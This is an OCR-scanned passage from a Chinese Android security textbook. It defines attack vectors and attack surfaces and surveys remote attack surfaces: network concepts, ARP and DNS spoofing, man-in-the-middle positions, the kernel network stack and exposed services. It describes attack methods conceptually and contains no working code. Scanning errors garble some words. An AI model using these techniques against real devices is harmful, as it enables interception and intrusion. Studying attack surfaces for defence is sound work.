件 类 别 中 更 具体 的 一 种 攻击 向 量 是 攻击 者 在 电子 邮件 消息 中 包含 一 个 可 点 击 URL。 如 果 这 个 链 
接 是 可 点 击 的 , 好 奇 心 可 能 会 让 接收 者 点 击 这 个 链接 , 而 这 一 动作 可 能 会 导致 对 目标 计算 机 的 成 
功 攻击 。 另 外 一 个 案例 是 图 像 处 理 库 , 这 个 共享 库 中 有 许多 耳 数 会 最 终 导致 执行 到 存在 安全 漏洞 
的 函数 上 ， 则 这 些 函 数 都 可 以 被 认为 是 存在 安全 漏洞 函数 的 攻击 向 量 。 类 似 地 ， 共 享 库 所 暴露 
API 的 某 个 子 集 可 以 触发 对 存在 安全 漏洞 函数 的 执行 , 那么 这 些 API 函数 中 任意 一 个 都 可 以 被 认 
为 是 一 个 攻击 向 量 。 最 后 , 利用 这 个 存在 漏洞 的 共享 库 的 任意 程序 也 被 视 为 一 个 攻击 向 量 。 这些 
分 类 可 以 帮助 防御 者 思考 如 何 才能 阻 断 攻击 , 也 会 帮助 攻击 者 对 目标 进行 隔离 以 便 找到 哪些 才 是 
需要 评估 的 代码 。 


5.1.2 ”攻击 面 


攻击 面 普遍 被 理解 为 目标 的 “软肋”"， 也 就 是 使 得 目标 易 受 攻击 的 功能 特性 。 这 是 一 个 从 物 
理 世 界 类 比 而 来 的 词汇 , 已 经 被 信息 安全 专业 人 员 广 泛 采纳 。 在 物理 世界 中 ,攻击 面 指 的 是 一 个 
对 象 暴 露 给 攻击 的 区 域 ,因此 必须 得 到 防御 。 例 如 ,城堡 的 城墙 有 护城河 进行 保护 ,坦克 的 外 表 
则 安装 着 装甲 , 那些 最 为 重要 的 人 体 带 官 则 由 防弹 衣 保护 。 所 有 这 些 都 是 在 物理 世界 中 受到 防御 
的 攻击 面 。 使 用 “攻击 面 ”这 一 术语 , 我 们 可 以 在 信息 安全 领域 应 用 物理 世界 中 已 获 证 明 的 逻辑 
规则 ， 从 而 减少 抽象 化 的 概念 。 

从 更 加 技术 性 的 角度 来 说 , 攻击 面 指 的 是 攻击 者 可 以 执行 并 进而 攻击 的 代码 。 与 攻击 向 量 不 同 
的 是 , 攻击 面 并 不 依赖 于 攻击 者 的 动作 , 或 者 要 求 安全 漏洞 必须 存在 。 简单 来 讲 , 它 描述 了 代码 中 
可 能 存在 着 尚 待 挖掘 的 安全 漏洞 的 位 置 。 在 之 前 基于 电子 邮件 的 攻击 的 例子 中 , 安全 漏洞 可 能 存在 
于 在 以 下 地 方 暴露 的 攻击 面 : 邮件 服务 器 的 协议 解析 器 、 邮 件 用 户 端 程序 的 处 理 代 码 , 甚至 是 将 邮 
件 消息 演 染 输出 到 接收 者 屏幕 上 的 代码 。 在 一 次 基于 浏览 器 的 攻击 中 , 由 浏览 器 所 支持 的 所 有 Web 
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相关 技术 都 构成 了 攻击 面 ， 包 括 超 文本 传输 协议 (HTTP )、 超 文本 标记 语言 (HTML )、 层 又 样式 
表 (CSS ) 和 可 扩展 矢量 图 形 (SVG ) 等 。 记 住 ， 从 定义 上 来 说 ,攻击 面 并 不 要 求 有 安全 漏洞 。 如 
果 一 段 代码 可 以 被 攻击 者 执行 操作 ， 那 么 它 就 被 视 为 一 个 攻击 面 ， 必 须 加 以 相应 的 研究 。 

与 攻击 向 量 类 似 , 攻击 面 也 可 以 从 通用 化 和 逐渐 具体 化 这 两 个 方面 进行 讨论 。 而 选择 哪 一 层 
具体 的 描述 通常 取决 于 不 同 的 场景 。 如 果 某 人 正在 高 层次 上 讨论 Android 设备 的 攻击 面 ， 他 可 能 
会 指出 无 线 攻 击 面 。 与 此 相反 ,如 果 在 讨论 一 个 特定 程序 的 攻击 面 ,他 则 会 指出 一 个 具体 的 函数 
或 API。 更 进一步 来 说 ， 在 本 地 攻击 的 场景 中 ， 他 可 能 会 指出 设备 上 的 一 个 具体 系统 路 径 。 在 研 
究 一 个 特定 的 攻击 面 时 , 经 常会 揭示 出 其 他 的 攻击 面 ， 比 如 那些 通过 多 路 命令 处 理 时 暴露 出 的 攻 
击 面 。 举 个 例子 ， 某 个 协议 实现 中 包含 多 种 不 同类 型 的 数据 包 ,， 有 一 个 函数 用 于 解析 该 协议 实现 
中 特定 类 型 的 数据 包 。 则 发 送 某 一 种 类 型 的 数据 包 会 达到 一 个 攻击 面 , 而 发 送 男 一 种 类 型 的 数据 
包 则 会 达到 另 一 个 攻击 面 。 

5.3.1 节 将 会 讲 到 ， 互 联网 通信 被 分 解 到 多 个 逻辑 层次 上 。 当 数据 从 一 层 传输 到 下 一 层 ， 它 
将 经 过 许多 不 同 的 攻击 面 。 图 5-1 显示 了 这 一 概念 的 一 个 实例 。 
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图 5-1 一 个 PHP Web 应 用 涉及 的 攻击 函 


在 图 5-1 中 , 待 分 析 系 统 最 外 层 的 攻击 面包 括 两 个 Web 服务 器 端口 , 如 果 攻 击 向 量 是 一 个 普 
通 请 求 〈 而 不 是 一 个 加 密 请 求 ), 那么 Web 服务 器 软件 以 及 任何 服务 端 Web 应 用 程序 构成 的 底层 
攻击 面 ， 都 是 可 以 被 达到 的 。 如 果 选 择 以 PHP Web 应 用 程序 作为 攻击 目标 ， 那 么 应 用 程序 代码 
和 PHP 解释 器 都 会 处 理 不 受信 任 的 数据 。 当 不 受信 任 的 数据 流 过 时 ， 更 多 的 攻击 面 将 会 被 暴露 。 

最 后 一 点 , 一 个 给 定 的 攻击 面 可 能 可 以 通过 多 个 攻击 向 量 来 达到 。 比 如 , 一 个 图 像 处 理 库 中 
的 安全 漏洞 ， 可 能 可 以 通过 电子 邮件 、 网 页 、 即 时 通信 应 用 或 其 他 向 量 触发 。 这 在 安全 漏洞 被 修 
补 时 是 特别 关键 的 。 如 果 修 补 仅仅 针对 某 一 个 向 量 , 那么 这 个 安全 漏洞 对 于 其 他 向 量 而 言 仍然 是 
可 被 利用 的 。 


5.2 ”对 攻击 面 进行 分 类 


通常 情况 下 ,目标 系统 攻击 面 的 大 小 与 它 和 其 他 系统 、 代 码 、 设 备 、 用 户 、 甚 至 其 自身 硬件 
的 交互 多 少 是 成 正比 例 相关 的 。 许 多 Android 设备 以 能 与 任意 设备 进行 交互 作为 目标 。 例 如 ， 
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Verizon 使 用 “Droid Does” 作 为 广告 语 , 来 宣传 他 们 的 设备 可 以 做 到 许 许多 多 的 事情 ,一 个 Android 
设备 的 攻击 面 是 如 此 的 广阔 ， 因 此 对 其 进行 解剖 与 分 类 是 非常 必要 的 。 


5.2.1 攻击 面 属性 


安全 研究 人 员 ， 无 论 是 攻击 者 还 是 防御 者 ， 都 会 审查 攻击 面 的 不 同属 性 来 进行 决策 。 表 5-1 
描述 了 几 个 关键 属性 ， 以 及 它们 如 此 重要 的 原因 。 


表 5-1 攻击 面 的 关键 属性 
属 性 推 ” 理 
攻击 向 量 所 需 的 用 户 交 互 和 认证 条 件 ， 限 制 了 给 定 攻 击 面 中 发 现任 意 安全 漏洞 的 影响 后 果 。 需 要 目标 用 户 做 某 
些 特殊 操作 才能 实施 的 攻击 就 会 变 得 相对 不 严重 ， 可 能 需要 结合 社会 工程 学 才能 成 功 。 相 似 的 ， 某 些 
攻击 面 ， 在 对 设备 已 拥有 访问 权限 或 者 满足 某 些 物理 接触 条 件 时 ， 才 是 可 达到 的 
获取 的 权限 ”在 某 个 给 定 攻 击 面 背 后 的 代码 可 能 是 以 极 高 的 权限 运行 ， 比 如 是 内 核 空间 中 的 代码 ， 而 另外 一 些 代码 
可 能 是 在 沙 盒 中 以 受 限 权限 运行 的 
内 存 安 全 性 ”以 非 内 存 安全 的 语言 (如 C 和 C++) 编写 的 程序 ， 比 起 以 内 存 安 全 的 语言 (如 Java) 编写 的 程序 ， 可 
能 存在 更 多 类 型 的 安全 漏洞 
复杂 性 复杂 的 代码 、 算 法 和 协议 更 难于 管理 ， 因 此 也 增加 了 程序 员 犯 错 的 可 能 


理解 和 分 析 这 些 属性 有 助 于 指导 安全 研究 的 优先 级 , 并 提升 研究 的 整体 效能 。 专 注 于 那些 特 
别 高 风险 的 攻击 面 ( 要求 低 、 高 权限 、 非 内 存 安全 以 及 高 复杂 度 等 )， 一 个 系统 可 以 更 快 地 被 攻 
击 或 者 加 固 。 一 般 而 言 ,攻击 者 会 尝试 以 尽 可 能 少 的 代价 获取 尽 可 能 多 的 权限 。 因 此 ,特别 高 风 
险 的 攻击 面 在 逻辑 上 是 最 需要 关注 的 。 


5.2.2 分 类 决策 


因为 Android 设备 拥有 如 此 广阔 和 复杂 的 攻击 面 ， 所 以 非常 有 必要 基于 一 些 通用 属性 将 它们 
进行 分 组 。 基 于 达到 给 定 攻 击 面 所 需 的 访问 级 别 ， 本 章 剩余 内 容 划 分 为 几 节 。 像 攻击 者 那样 ,我 
们 也 会 先 从 最 危险 同样 也 是 最 吸引 人 的 攻击 面 开 始 分 析 。 按照 需要 , 许多 节 还 会 进一步 划分 成 更 
细 粒 度 的 小 节 , 来 讨论 一 些 更 深入 的 攻击 面 。 对 于 每 个 攻击 面 , 我 们 会 提供 一 些 背 景 信息 ， 如 意 
图 提供 的 功能 。 在 有 些 情况 下 ,我 们 将 提供 一 些 工 具 和 技术 , 用 于 发 现 攻击 面 暴 露出 的 底层 代码 
的 一 些 特定 属性 。 最 后 ， 我 们 将 讨论 利用 攻击 面 中 安全 漏洞 的 一 些 已 知 攻击 与 攻击 向 量 。 


5.3 ”远程 攻击 面 


Android 设备 ， 或 者 其 他 任意 的 计算 系统 ， 所 暴露 的 最 大 也 是 最 具 吸 引力 的 攻击 面 就 是 远程 
攻击 面 。 "远程 ”这 个 术语 同样 也 是 一 个 攻击 向 量 的 分 类 ， 表 明 攻 击 者 无 须 在 物理 位 置 接近 目标 
的 事实 。 攻 击 者 可 以 通过 一 个 计算 机 网 络 (通常 是 因特网 ) 来 发 起 攻击 。 以 这 种 类 型 攻击 面 为 目 
标的 攻击 是 特别 具有 人 危害 性 的 ， 因 为 它们 可 以 让 一 位 未 知 攻击 者 攻陷 设备 。 

更 近 距 离 观 察 , 远程 攻击 面 可 以 基于 一 些 属性 , 将 其 进一步 切 分 成 一 些 更 独特 的 分 组 。 某 些 
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远程 攻击 面 是 始终 可 达 的 , 而 其 他 一 些 仅仅 在 目标 发 起 网 络 通信 时 才 是 可 达 的 。 无 需 任何 用 户 交 
互 的 安全 漏洞 是 特别 危险 的 , 因为 它们 可 以 用 于 传播 网 络 蠕虫 。 需要 少量 交互 ( 如 点 击 一 个 链接 ) 
的 安全 漏洞 也 可 以 用 来 传播 蠕虫 , 但 是 这 类 蠕虫 传播 速度 会 慢 一 些 。 其 他 一 些 攻击 面 在 仅 当 攻击 
者 处 于 一 个 特权 位 置 时 才 可 达 ， 比 如 与 目标 处 于 同一 个 局 域 网 中 。 男 外, 某 些 攻击 面 仅 针对 已 经 
被 移动 运营 商 或 谷歌 等 中 间 人 处 理 过 的 数据 。 

下 一 小 节 将 概要 介绍 一 些 重要 网 络 概念 , 并 说 明 移动 设备 的 一 些 关 键 差异 。 紧 随 其 后 的 几 个 
小 节 会 对 Android 设备 暴露 的 各 种 不 同类 型 的 远程 攻击 面 进行 详细 讨论 。 


5.3.1 网 络 概念 


掌握 基本 的 网 络 概念 对 于 真正 理解 各 种 通过 计算 机 网 络 实施 的 攻击 是 非常 必要 的 。 诸 如 开放 
系统 互联 (OSI ) 模型 、 客 户 端 一 服务 器 模型 等 概念 描述 了 用 来 对 网 络 进行 概念 化 的 抽象 构件 。 
典型 的 网 络 配置 限制 了 可 以 实施 的 攻击 类 型 ， 从 而 也 限制 了 暴露 的 攻击 面 。 无 论 是 攻击 者 还 是 防 
御 者 ， 知 道 这 些 限 制 以 及 绕 过 它们 的 方法 都 可 以 增 大 成 功 的 机 会 。 

1. 因特网 

由 美国 国防 先进 研究 项 目 局 ( DARPA ) 创立 的 因特网 ， 是 一 个 计算 机 系统 的 互联 网 络 。 家 
庭 计 算 机 和 移动 设备 是 这 个 网 络 上 最 外 层 的 节点 , 在 这 些 节点 之 间 是 大 量 的 称 为 路 由 器 的 后 端 系 
统 。 当 一 部 智能 手机 连 网 时 , 一 系列 使 用 不 同 协 议 的 数据 包 会 通过 网 络 传输 ， 对 请 求 的 服务 器 进 
行 定位 、 联 系 和 交换 数据 。 在 两 个 端点 之 间 的 计算 机 ， 每 一 台 被 称 为 一 跳 ( hop ), 构成 了 一 条 网 
络 路 径 。 手机 通信 和 网络 与 之 十 分 类 似 ， 只 不 过 手机 与 最 近 基 站 是 通过 无 线 进行 传输 的 。 当 用 户 在 
移动 时 ,他 的 设备 所 连接 的 基站 也 会 相应 改变 ,基站 构成 了 移动 设备 连接 因特网 路 径 中 的 第 一 跳 。 






















































































































































































2. OS| 模型 
OSI 模 型 描述 了 网 络 通信 中 涉及 的 7 层 协 议 。 图 5-2 显示 了 这 些 协议 层 ， 以 及 这 些 协 议 层 是 
如 何 堆栈 的 。 


口 第 1 层 一 -物理 层 描 述 了 两 台 计 算 机 之 间 是 如 何 传输 数据 的 。 在 这 一 层 上 ， 数 据 都 是 以 

二 进 制 方式 传输 的 。 以 太 网 和 Wi-Fi 的 物理 部 分 在 这 一 层 上 操作 ; 

口 第 2 层 一 一 数据 链 路 层 对 物理 层 传输 数据 增加 了 纠 错 能 力 。 以 太 网 和 Wi-Fi 的 剩余 部 分 以 

及 逻辑 链 路 控制 (LLC ) 和 地 址 解析 协议 (ARP ) 属于 这 一 层 ; 

口 第 3 层 一 一 网 络 层 是 因特网 协议 (IP )、 因 特 网 控制 消息 协议 (ICMP ) 和 因特网 网 关 消息 
协议 (IGMP ) 运行 的 层次 。 网 络 层 的 目标 是 提供 路 由 机 制 ， 使 数据 包 能 够 被 发 送 到 它们 
的 目标 节点 上 ; 

口 第 4 层 一 一 传输 层 的 目标 是 为 底层 的 数据 传输 增加 可 靠 性 。 传 输 控制 协议 (TCP ) 和 用 户 

数据 报 协议 (UDP ) 在 这 一 层 上 运行 ; 

口 第 5 层 一 一 正如 其 名 , 会 话 层 管理 网 络 主机 之 间 的 会 话 。 传 输 层 安全 协议 (TLS ) 和 安全 

套 接 字 层 (SSL ) 在 这 一 层 上 工作 ; 

第 6 层 一 一 表示 层 处 理 主 机 之 间 如 何 表达 数据 的 语法 协定 。 这 一 层 上 的 协议 很 少 ， 而 多 
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目标 因特网 邮件 扩展 (MIME ) 是 这 层 上 的 一 个 著名 标准 ; 

口 第 7 层 层 是 高 层次 协议 客户 端 和 服务 器 应 用 程序 之 间 直 接 产生 与 消费 数据 的 层 
次 。 这 一 层 上 的 标准 协议 包括 域名 系统 协议 (DNS )、 动 态 主 机 配置 协议 (DHCP )、 文 件 
传输 协议 (FTP )、 简 单 网 络 管理 协议 (SNMP )、 超 文本 传输 协议 (HTTP ) 和 简单 邮件 传 
输 协 议 (SMTP ) 等 。 
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第 2 层 : 数据 链 路 层 








第 1 层 : 物理 
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图 5-2 OSI 的 7 层 模型 


现代 网 络 通信 已 经 在 7 层 OSI 模型 上 进行 了 进一步 扩展 ,举例 来 说 , Web 服务 经 常 利用 HTTP 
协议 层 之 上 的 一 层 或 多 层 来 实现 。 在 Android 系统 中 ,缓冲 协议 ( protobufs ) 用 来 传输 结构 化 数 
据 并 实现 远程 过 程 调用 (RPC ) 协议 。 尽 管 protobufs 看 起 来 是 提供 了 表示 层 的 功能 ， 但 这 个 协 
议 的 通信 经 常 使 用 HTTP 传输 。 这 些 层 之 间 的 界限 已 经 变 得 模糊 。 

本 节 中 提 及 的 协议 在 现代 因特网 连接 的 设备 中 扮演 着 重要 角色 。Android 设备 支持 并 使 用 这 
里 提 及 的 所 有 协议 , 并 以 统一 的 方式 或 格式 进行 了 实现 。 后 面 几 小 节 将 讨论 这 些 协议 及 其 对 应 的 
攻击 面 是 如 何 起 作用 的 。 

3. 网 络 配置 与 防御 

今天 的 因特网 生态 圈 已 经 和 1980 年 代 时 期 完全 不 同 了 ， 在 那个 时 代 ， 因 特 网 绝 大 部 分 是 开 
放 的 ,主机 之 间 可 以 互相 自由 地 连接 , 用 户 被 普遍 认为 是 可 信 的 。20 世纪 80 年 代 末 和 90 年代 初 ， 
网 络 管理 员 们 开始 注意 到 一 些 恶 意 用 户 入 侵 到 计算 机 系统 中 。 人 们 意识 到 不 是 所 有 用 户 都 可 以 信 
任 , 于 是 防火 墙 开始 出 现 并 被 部 署 在 网 络 边界 上 进行 防御 。 从 那 时 起 , 保护 单一 主机 免 受 网 络 攻 
击 的 主机 防火 墙 也 偶尔 被 使 用 。 

时 间 快 进 到 1999 年 ， 网 络 地 址 转换 (NAT ) 技术 被 发 明 ， 使 得 使 用 私有 地 址 的 网 络 内 部 主 
机 可 以 和 开放 因特网 上 的 主机 进行 通信 ，2013 年 ， 可 分 配 的 IPv4 地 址 块 减少 到 历史 新 低 ，NAT 
技术 帮助 缓解 了 这 一 压力 。 出 于 这 些 原 因 ,，NAT 在 家 庭 网 络 与 手机 网 络 中 都 非常 普遍 。 这 种 技术 
的 工作 原理 是 在 网 络 层 修改 地 址 ， 简 单 而 言 ，NAT 路 由 器 作为 在 城 域 网 ( WAN ) 和 本 地 局 域 网 
(CLAN ) 主机 之 间 的 一 个 透明 代理 ,从 城 域 网 连接 到 局 域 网 中 一 台 主 机 需要 在 NAT 路 由 器 上 进行 
特殊 的 配置 ， 如 果 没 有 进行 这 类 配置 ，NAT 路 由 器 就 相当 于 一 种 防火 墙 。 结 果 是 ，NAT 可 以 让 
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完全 屏蔽 某 些 攻击 面 。 

尽管 移动 通信 网 络 和 Wi-Fi 网 络 都 是 通过 无 线 访问 的 , 但 是 两 者 在 如 何 提供 、 配 置 与 控制 上 
有 着 区 别 。 对 给 定 的 运营 商 网 络 进行 访问 是 被 严密 控制 的 , 需要 从 运营 商 那 里 购买 一 张 SIM (用 
户 身份 识别 模块 ) 卡 。 运 营 商 通常 会 计算 数据 流量 ， 并 以 MB 或 GB 为 单位 计 费 。 他 们 也 会 通过 
配置 接 人 点 名 称 (APN ) 的 方式 ， 来 限制 移动 设备 在 网 络 中 的 行为 ， 例 如 可 以 通过 APN 禁用 客 
户 间 的 连接 。 正 如 前 面 提 到 的 ， 运 营 商 也 会 尽 可 能 地 使 用 NAT 技术 。 考 虑 到 所 有 这 些 方面 ， 运 
营 商 网 络 比 家 庭 网 络 更 加 限制 了 所 暴露 的 攻击 面 ,但 是 要 注意 的 是 ,运营 商 网 络 的 情况 各 有 不 同 ， 
一 些 安全 意识 薄弱 的 运营 商 可 能 会 将 客户 的 移动 设备 直接 暴露 给 因特网 。 

4. 相 邻 关系 

在 网 络 中 ， 相 邻 指 的 是 节点 之 间 的 关系 。 本 章 会 涉及 两 种 相 邻 关 系 , 一 种 是 局 域 网 中 设备 的 
相 邻 关系 ， 我 们 称 之 为 网 络 邻居 或 逻辑 相 邻 。 这 个 概念 与 物理 相 邻 是 不 同 的 ,物理 相 邻 指 的 是 攻 
击 者 的 物理 位 置 与 他 的 攻击 目标 在 某 一 特定 范围 内 。 而 攻击 者 可 以 通过 直接 访问 局 域 网 、 攻 陷 局 
域 网 中 其 他 主机 , 或 者 通过 虚拟 专 有 网 ( VPN ) 进行 访问 等 多 种 方式 , 来 和 目标 主机 建立 起 网 络 
邻居 关系 。 另 外 一 种 相 邻 关系 是 通过 路 由 器 节点 获得 的 特权 位 置 , 攻击 者 可 以 通过 攻击 网 络 路 由 
机 制 或 者 攻陷 目标 节点 的 路 由 器 或 代理 , 来 建立 起 这 种 相 邻 关系 。 在 这 种 情况 下 , 攻击 者 被 视 为 
在 路 径 上 (on-path )， 也 就 是 说 ， 攻 击 者 在 目标 节点 和 与 之 通信 的 远程 节点 之 间 的 网 络 路 径 上 。 
获得 这 种 更 受信 任 的 位 置 , 可 以 让 许多 种 原来 并 不 可 行 的 攻击 变 得 可 行 。 我 们 将 在 后 面 使 用 这 些 
概念 ， 来 明确 地 标识 特定 攻击 面 是 否 可 达 ， 如 果 攻 击 面 可 达 ， 是 在 什么 样 的 范围 中 可 达 。 

网 络 邻 居 

与 目标 节点 成 为 同一 局 域 网 上 的 邻居 节点 , 攻击 者 可 以 获得 一 个 发 起 攻击 的 特权 优势 位 置 。 一 
般 的 局 域 网 配置 使 得 网 络 相 当 开 放 ， 和 早期 的 因特网 比较 类 似 。 首先 , 局域网 上 的 计算 机 不 会 在 任 
何 NAT 设 备 或 边界 防火 墙 后 面 。 此 外 ， 节 点 之 间 通 常 也 没有 路 由 器 。 数 据 包 不 再 使 用 全 协议 进行 
路 由 ， 而 是 基于 媒介 访问 控制 (MAC ) 地 址 进行 广播 或 分 发 ， 而 主机 间 的 通信 经 常 只 做 很 少 其 至 
根本 没有 做 协议 验证 , 一些 局 域 网 配置 其 至 允许 任意 节点 监听 网 络 上 的 所 有 通信 。 这 类 攻击 面 本 身 
就 已 经 拥有 了 很 强 的 能 力 ， 而 将 它 和 一 些 技巧 相 结合 ， 可 以 让 一 些 更 加 强力 的 攻击 变 得 可 能 。 

极 少 进行 协议 验证 的 事实 ,使 得 各 种 类 型 的 欺骗 攻击 都 可 以 成 功 实施 。 在 一 次 欺骗 攻击 中 ， 
攻击 者 会 对 他 发 出 数据 包 的 源 地 址 进行 伪造 , 企图 伪装 成 其 他 主机 , 达到 利用 信任 关系 或 者 隐藏 
攻击 真实 源 的 目的 。 这 些 类 型 的 攻击 在 公共 因特网 上 是 难以 实施 的 , 因为 上 面 存在 着 防范 欺骗 攻 
击 数据 包 的 过 滤 规 则 , 以 及 内 在 的 延迟 问题 。 这 种 类 型 的 绝 大 多 数 攻击 在 网 络 层 及 之 上 的 层 运行 ， 
但 是 这 并 不 是 严格 的 要 求 。 一 类 称 为 ARP 欺骗 或 ARP 缓存 中 毒 的 欺骗 攻击 是 在 数据 链 路 层 上 实 
施 的 。 如 果 成 功 , 这 类 攻击 可 以 让 攻击 者 欺骗 一 个 目标 节点 , 使 之 认为 攻击 节点 就 是 网 关 路 由 器 。 
这 可 以 有 效 地 让 攻击 者 从 网 络 邻 居 的 身份 转变 为 路 径 上 设备 的 角色 。 而 从 这 个 关键 点 可 能 进行 的 
攻击 将 在 下 一 小 节 中 详细 讨论 。 对 于 ARP 欺骗 攻击 最 有 效 的 防御 方法 是 使 用 静态 ARP 映射 表 ， 
但 这 在 未 root 的 移动 设备 上 是 不 可 行 的 。 对 DNS 的 攻击 更 加 容易 ， 因 为 网 络 邻 居 节 点 拥有 很 低 
的 延迟 , 这 意味 着 攻击 者 可 以 比 因特网 上 的 主机 更 快 进行 响应 , 对 DHCP 的 欺骗 攻击 对 于 获取 日 
标 系统 更 多 的 控制 权 也 是 相当 有 效 的 。 
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路 径 上 攻击 

路 径 上 攻击 ， 通 党 被 称 为 中 间 人 (MitM ) 攻击 ， 是 非常 具有 破坏 力 的 一 种 攻击 方式 。 在 达 
到 网 络 上 这 样 一 个 受信 任 的 位 置 后 , 攻击 者 可 以 选择 对 流 经 它 的 任意 网 络 流量 进行 阻 断 、 修 改 或 
者 转发 。 攻击 者 也 可 以 对 流量 进行 监 昕 ， 从 而 发 现 认证 凭据 ， 如 口令 或 者 浏览 器 Cookie, 其 至 可 
以 对 加 密 通信 进行 降级 、 剥 离 或 者 其 他 类 型 的 透明 监控 。 在 这 样 一 个 受信 任 的 关键 点 上 ,攻击 者 
可 能 同时 影响 一 大 群 用 户 , 或 者 选择 性 地 针对 某 一 个 用 户 。 从 这 个 网 络 路 径 上 经 过 的 任何 人 都 可 
能 受到 攻击 。 

获得 这 种 类 型 位 置 的 一 种 方法 是 , 利用 目标 与 其 所 钟爱 服务 器 之 间 已 建立 的 信任 关系 。 许 多 
软件 客户 端 都 是 对 服务 器 充分 信任 的 。 尽 管 攻 击 者 可 以 建立 一 些 并 不 在 路 径 上 的 恶意 服务 器 来 利 
用 这 类 信任 关系 , 但 是 他 们 必须 说 服 目 标 来 访问 这 些 服务 器 。 在 路 径 上 意味 着 攻击 者 可 以 假 胃 成 
目标 用 户 连 接 的 任意 服务 器 。 例 如 ， 考 虑 目标 用 户 会 在 每 天 上 午 通过 他 的 Android 手机 访问 
http://www.cnn.com， 那 么 路 径 上 的 攻击 者 可 以 假冒 成 CNN 站 点 ， 分 发 漏洞 利用 代码 ， 并 展示 原 
始 的 CNN 站 点 内 容 , 这 样 目 标 用 户 就 不 会 意识 到 有 任何 异常 。 我 们 将 在 5.3.5 节 中 更 加 详细 地 讨 
论 Android 的 客户 端 攻击 面 。 

值得 庆幸 的 是 ,对 于 大 多 数 攻 击 者 而 言 , 想 要 在 因特网 上 达到 这 种 特权 角色 还 是 相当 困难 的 。 
成 为 一 个 路 径 上 攻击 者 的 方法 包括 攻陷 路 由 器 或 DNS 服务 器 、 使 用 合法 的 监听 手段 ， 在 网 络 邻 
居 条 件 下 操纵 主机 ， 以 及 修改 全 局 的 因特网 路 由 表 等 。 一 种 在 实际 中 相对 简单 的 方法 是 通过 注册 
商 动 持 域名。 男 一 种 相对 容易 的 方法 只 对 Wi-Fi 和 移动 通信 等 无 线 网 络 有 效 。 在 这 些 网 络 上 ， 可 
能 利用 物理 邻近 关系 来 操纵 无 线 电 通信 ， 或 是 搭建 一 个 供 目 标 连 接 的 假冒 无 线 访问 点 或 伪 基 站 。 

现在 我 们 已 经 介绍 完 基 本 的 网 络 概 念 以 及 它们 是 如 何 与 攻击 和 攻击 者 关联 的 , 是 时 候 深入 到 
Android 攻击 面 了 。 理 解 这 些 概念 ， 对 于 分 析 一 个 给 定 攻 击 面 是 否 可 达 是 非常 关键 的 。 


5.3.2 网络 协 议 栈 


安全 漏洞 研究 中 的 “圣杯 ”是 这 样 一 种 远程 攻击 ， 它 不 需要 与 目标 交互 就 可 以 实施 ， 而 且 能 
够 获取 系统 的 完全 访问 权限 。 在 这 种 攻击 场景 中 , 攻击 者 通常 只 需 能 在 因特网 上 与 目标 主机 进行 
通信 即 可 。 而 这 类 攻击 可 以 简单 到 发 送 单个 数据 包 , 也 可 能 需要 一 长 串 复杂 的 协议 谈判 过 程 。 由 
于 防火 墙 和 NAT 技术 的 广泛 采用 ， 这 一 攻击 面 变 得 更 难以 可 达 ， 因 此 在 这 些 底 层 代 码 中 的 安全 
漏洞 往往 只 暴露 给 网 络 邻居 攻击 者 。 

在 Android 系统 上 ， 符 合 这 一 描述 的 主要 攻击 面 是 Linux 内 核 中 的 网 络 协议 栈 ， 这 一 软件 栈 
中 包含 了 对 全、TCP、UDP 和 ICMP 等 协议 的 实现 。 网 络 协议 栈 的 目标 是 为 操作 系统 维护 网 络 状 
态 ， 并 通过 套 接 字 API 向 用 户 空间 软件 开放 。 如 果 在 对 IPv4 或 IPv6 数据 包 处 理 过 程 中 存在 着 一 
个 可 利用 的 缓冲 区 溢出 漏洞 , 那么 这 将 成 为 可 能 出 现 的 最 为 严重 的 安全 漏洞 类 型 。 对 这 样 一 个 安 
全 漏洞 的 成 功利 用 , 将 导致 远程 执行 内 核 空间 中 的 任意 代码 。 然 而 这 种 类 型 的 安全 漏洞 是 非常 稀 
有 的 ， 当 然 也 没有 出 现 以 Android 设备 为 目标 的 此 类 漏洞 。 
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注意 ”内存 破 坏 漏洞 肯定 不 是 影响 网 络 协议 栈 的 唯一 一 种 安全 漏洞 类 型 ， 举 例 来 说 ，TCP 序列 
号 可 预测 等 协议 层 攻击 都 可 以 归 类 到 这 个 攻击 面 中 。 





遗憾 的 是 ， 进 一 步 枚 举 这 个 攻击 面 是 个 非常 费 人 力 的 过 程 。 在 一 个 活跃 设备 上 ，/proc/net 目 
录 是 尤其 值得 关注 的 。 具体 而 言 , 这 个 目录 中 的 ptype 文件 中 提供 了 设备 所 支持 的 协议 类 型 列表 ， 
以 及 这 些 协议 所 对 应 的 接收 函数 。 如 下 片段 显示 了 在 一 部 运行 Android 4.3 的 Galaxy Nexus 手机 
中 的 这 一 文件 内 容 : 


shell@maguro:/ $ cat /proc/net/ptype 
































Type Device Function 

0800 ip_rcv+0x0/0x430 
0011 llc_rcv+0x0/0x314 
0004 llc_rcv+0x0/0x314 
00f5 phonet_rcv+0x0/0x524 
0806 arp_rcv+0x0/0x144 





86dd ipv6_rcv+0x0/0x600 
shell@maguro:/ S 


从 这 个 输出 结果 中 可 以 看 到 , 该 设备 内 核 支 持 IPv4、IPv6、 两 种 类 型 的 LLC、PhoNet 和 ARP。 
这 些 信息 及 更 多 细节 在 内 核 的 构建 配置 文件 中 可 以 找到 。, 获取 内 核 构建 配置 文件 的 具体 指令 将 在 
第 10 章 中 提供 。 


5.3.3 ”暴露 的 网 络 服务 


无 需 目标 用 户 交 互 的 联网 服务 是 第 二 位 有 吸引 力 的 攻击 面 。 这 些 服务 通常 在 用 户 空间 中 执 
行 , 消除 了 获得 内 核 空间 代码 执行 的 可 能 性 。 但 是 仍然 有 一 些 潜在 的 网 络 服 务 ， 如 果 被 成 功利 用 
攻击 面 中 的 安全 漏洞 ， 仍 可 以 获取 到 root 权限 ， 不 过 这 类 网 络 服务 在 Android 系统 上 是 极 少 的 。 
无 论 如 何 , 利用 这 一 攻击 面 暴露 的 安全 漏洞 可 以 让 攻击 者 在 设备 上 获得 初始 立足 点 ,而 进一步 的 
访问 权限 可 以 通过 权限 提升 攻击 来 获取 ， 我 们 将 在 本 章 后 面 讨论 这 类 攻击 。 

很 遗憾 , 绝 大 多 数 Android 设备 默认 不 包含 任何 联网 服务 。 这 一 攻击 面 的 大 小 主要 取决 于 在 设 
备 上 运行 的 软件 。 举 例 来 说 ,第 10 章 将 介绍 如 何 启用 可 经 过 TCP/IP 进行 访问 的 Android 调试 桥 
( ADB ) 服务 。 如 果 进 行 了 这 一 操作 ,设备 就 会 在 网 络 上 监听 连接 ,暴露 出 原先 并 不 存在 的 额外 攻 
